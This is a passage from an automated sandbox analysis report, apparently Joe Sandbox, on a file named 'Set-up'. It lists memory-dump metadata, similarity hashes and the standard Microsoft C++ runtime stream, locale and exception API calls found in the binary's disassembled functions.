                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?sgetc@?$basic_streambuf@_H_prolog3_catch$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_?snextc@?$basic_streambuf@_?sputc@?$basic_streambuf@_Ipfx@?$basic_istream@_V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 4272017878-0
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2F032
                                                                                              • ?_Ipfx@?$basic_istream@GU?$char_traits@G@std@@@std@@QAE_N_N@Z.MSVCP100(00000000), ref: 6BC2F055
                                                                                                • Part of subcall function 6BC1E00D: __EH_prolog3_catch.LIBCMT ref: 6BC1E014
                                                                                                • Part of subcall function 6BC1E00D: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E037
                                                                                                • Part of subcall function 6BC1E00D: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E05C
                                                                                                • Part of subcall function 6BC1E00D: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E085
                                                                                                • Part of subcall function 6BC1E00D: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1E0AE
                                                                                              • ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000000), ref: 6BC2F079
                                                                                              • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP100(?,00000000), ref: 6BC2F097
                                                                                              • ?snextc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(?,00000000), ref: 6BC2F0BC
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(00000000,00000000,00000000), ref: 6BC2F0EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?sgetc@?$basic_streambuf@_H_prolog3_catch$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_?snextc@?$basic_streambuf@_?sputc@?$basic_streambuf@_G@std@@@std@@Ipfx@?$basic_istream@U?$char_traits@V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 2946896089-0
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2C274
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000014), ref: 6BC2C29C
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000001,?,00000014), ref: 6BC2C2B8
                                                                                              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP100(?,00000001,?,00000014), ref: 6BC2C2D4
                                                                                              • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(?,00000001,?,00000014), ref: 6BC2C2F4
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000014), ref: 6BC2C323
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: D@std@@@std@@U?$char_traits@$?sgetc@?$basic_streambuf@H_prolog3_catchU?$char_traits@_W@std@@@std@@$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_?snextc@?$basic_streambuf@?sputc@?$basic_streambuf@Ipfx@?$basic_istream@V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 2906793984-0
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2BF39
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000000), ref: 6BC2BF5C
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000000), ref: 6BC2BF80
                                                                                              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP100(00000000,00000000), ref: 6BC2BF96
                                                                                              • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000000,00000000), ref: 6BC2BFB3
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(00000000,00000000,00000000), ref: 6BC2BFE1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: D@std@@@std@@U?$char_traits@$?sgetc@?$basic_streambuf@H_prolog3_catchU?$char_traits@_W@std@@@std@@$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_?snextc@?$basic_streambuf@?sputc@?$basic_streambuf@Ipfx@?$basic_istream@V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 2906793984-0
                                                                                              APIs
                                                                                              • ___lc_handle_func.MSVCR100 ref: 6BC3ACCB
                                                                                              • ___lc_codepage_func.MSVCR100 ref: 6BC3ACD4
                                                                                              • _GetLocaleForCP.MSVCP100(?,?,?,?,6BC1C0E9,?,?), ref: 6BC3AD04
                                                                                                • Part of subcall function 6BC3A8CC: _malloc_crt.MSVCR100(0000000C,00000001,00000001,?,00000000,?,6BC3AA3B,?,00000001,00000001,00000000,00000000,?,6BC2249E,00000000,?), ref: 6BC3A90A
                                                                                                • Part of subcall function 6BC3A8CC: InterlockedCompareExchange.KERNEL32(00000000,00000000,00000001), ref: 6BC3A932
                                                                                              • ___mb_cur_max_l_func.MSVCR100(00000000,00000000,00000000,?,?,?,6BC1C0E9,?,?), ref: 6BC3AD11
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000000,6BC1C0E9,?,?), ref: 6BC3AD25
                                                                                              • _errno.MSVCR100 ref: 6BC3AD35
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharCompareExchangeInterlockedLocaleMultiWide___lc_codepage_func___lc_handle_func___mb_cur_max_l_func_errno_malloc_crt
                                                                                              • String ID:
                                                                                              • API String ID: 495737583-0
                                                                                              APIs
                                                                                              • ___lc_handle_func.MSVCR100 ref: 6BC3B2D9
                                                                                              • ___lc_codepage_func.MSVCR100 ref: 6BC3B2E7
                                                                                              • _calloc_crt.MSVCR100(00000100,00000002,?,?,6BC1B87C,?), ref: 6BC3B2F7
                                                                                              • __pctype_func.MSVCR100 ref: 6BC3B30B
                                                                                              • memcpy.MSVCR100(?,00000000), ref: 6BC3B315
                                                                                              • __pctype_func.MSVCR100 ref: 6BC3B326
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: __pctype_func$___lc_codepage_func___lc_handle_func_calloc_crtmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 3442565142-0
                                                                                              APIs
                                                                                              • _Maklocchr.LIBCPMT ref: 6BC2A11C
                                                                                                • Part of subcall function 6BC223EC: _Mbrtowc.MSVCP100(00000000,00000000,00000001,00000000,6BC3C44E,?,?,?,6BC3C44E,?), ref: 6BC2240C
                                                                                              • _Maklocchr.LIBCPMT ref: 6BC2A180
                                                                                              • _Maklocchr.LIBCPMT ref: 6BC2A153
                                                                                                • Part of subcall function 6BC2490A: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(?,6BC249A8,?,?,00000000,?,6BC29E20,?,?,?,?,?,00000018), ref: 6BC24915
                                                                                              • _Stolx.MSVCP100(?,?,0000000A,?,?,?,?), ref: 6BC2A275
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Maklocchr$?sgetc@?$basic_streambuf@_MbrtowcStolxU?$char_traits@_W@std@@@std@@
                                                                                              • String ID: -
                                                                                              • API String ID: 1221011742-2547889144
                                                                                              APIs
                                                                                              • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP100(invalid string position), ref: 6BC2A81E
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20D79
                                                                                                • Part of subcall function 6BC20D64: _CxxThrowException.MSVCR100(?,6BC4CACC), ref: 6BC20D8F
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20DAF
                                                                                                • Part of subcall function 6BC20D64: _CxxThrowException.MSVCR100(?,6BC484B4), ref: 6BC20DC5
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20DE5
                                                                                                • Part of subcall function 6BC20D64: _CxxThrowException.MSVCR100(?,6BC4C9D0), ref: 6BC20DFB
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABV01@@Z.MSVCR100(?,?,?,?,6BC4C9D0), ref: 6BC20E11
                                                                                              • ?_Xlength_error@std@@YAXPBD@Z.MSVCP100(string too long), ref: 6BC2A840
                                                                                              • memcpy.MSVCR100(?,?), ref: 6BC2A884
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@$ExceptionThrow$V01@@Xlength_error@std@@Xout_of_range@std@@memcpy
                                                                                              • String ID: invalid string position$string too long
                                                                                              • API String ID: 3077978391-4289949731
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC17BB7
                                                                                              • ??0invalid_operation@Concurrency@@QAE@PBD@Z.MSVCR100(Deleting link registry before removing all the links,00000010,6BC17E2F), ref: 6BC17BDC
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C880), ref: 6BC17BEB
                                                                                              • ??_V@YAXPAX@Z.MSVCR100(?,00000010,6BC17E2F), ref: 6BC17BF8
                                                                                              Strings
                                                                                              • Deleting link registry before removing all the links, xrefs: 6BC17BD4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0invalid_operation@Concurrency@@ExceptionH_prolog3Throw
                                                                                              • String ID: Deleting link registry before removing all the links
                                                                                              • API String ID: 1654019315-1123019286
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC171FD
                                                                                              • ??0invalid_operation@Concurrency@@QAE@PBD@Z.MSVCR100(Deleting link registry before removing all the links,00000010,6BC17481), ref: 6BC17222
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C880), ref: 6BC17231
                                                                                              • ??_V@YAXPAX@Z.MSVCR100(?,00000010,6BC17481), ref: 6BC1723E
                                                                                              Strings
                                                                                              • Deleting link registry before removing all the links, xrefs: 6BC1721A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0invalid_operation@Concurrency@@ExceptionH_prolog3Throw
                                                                                              • String ID: Deleting link registry before removing all the links
                                                                                              • API String ID: 1654019315-1123019286
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: String___lc_codepage_func___lc_handle_func__crt__pctype_funcisupper
                                                                                              • String ID:
                                                                                              • API String ID: 3436188357-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: String___lc_codepage_func___lc_handle_func__crt__pctype_funcislower
                                                                                              • String ID:
                                                                                              • API String ID: 2887104122-0
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2D996
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000014), ref: 6BC2D9BE
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000001,?,00000014), ref: 6BC2D9E6
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000014), ref: 6BC2DA26
                                                                                              • ?snextc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(?,?,00000001,?,00000014), ref: 6BC2DA68
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?sgetc@?$basic_streambuf@_H_prolog3_catch$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_?snextc@?$basic_streambuf@_Ipfx@?$basic_istream@_V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 4122568051-0
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2F24B
                                                                                              • ?_Ipfx@?$basic_istream@GU?$char_traits@G@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000014), ref: 6BC2F273
                                                                                                • Part of subcall function 6BC1E00D: __EH_prolog3_catch.LIBCMT ref: 6BC1E014
                                                                                                • Part of subcall function 6BC1E00D: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E037
                                                                                                • Part of subcall function 6BC1E00D: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E05C
                                                                                                • Part of subcall function 6BC1E00D: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E085
                                                                                                • Part of subcall function 6BC1E00D: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1E0AE
                                                                                              • ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000001,?,00000014), ref: 6BC2F29B
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000014), ref: 6BC2F2DB
                                                                                              • ?snextc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(?,?,00000001,?,00000014), ref: 6BC2F31D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?sgetc@?$basic_streambuf@_H_prolog3_catch$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_?snextc@?$basic_streambuf@_G@std@@@std@@Ipfx@?$basic_istream@U?$char_traits@V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 560853571-0
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2C136
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000014), ref: 6BC2C15E
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000001,?,00000014), ref: 6BC2C186
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000014), ref: 6BC2C1BE
                                                                                              • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(?,?,00000001,?,00000014), ref: 6BC2C1FA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Similarity
                                                                                              • API ID: D@std@@@std@@U?$char_traits@$?sgetc@?$basic_streambuf@H_prolog3_catchU?$char_traits@_W@std@@@std@@$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_?snextc@?$basic_streambuf@Ipfx@?$basic_istream@V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 2633556001-0
                                                                                              • Opcode ID: f4cfbad9a2bfc381a41a0875e8456feeb76208453a11f56e402ba6ff04066081
                                                                                              • Instruction ID: c5c2468c20390408450fd15890f8e70786d0ec2fe1e96ac87b24e21be1bda420
                                                                                              • Opcode Fuzzy Hash: f4cfbad9a2bfc381a41a0875e8456feeb76208453a11f56e402ba6ff04066081
                                                                                              • Instruction Fuzzy Hash: 04319131915749CFCB10CF69C99299EBBF0BF45324B10859EE8A6A72A1E738DB01CF51
                                                                                              APIs
                                                                                              • ___lc_handle_func.MSVCR100 ref: 6BC3AC2C
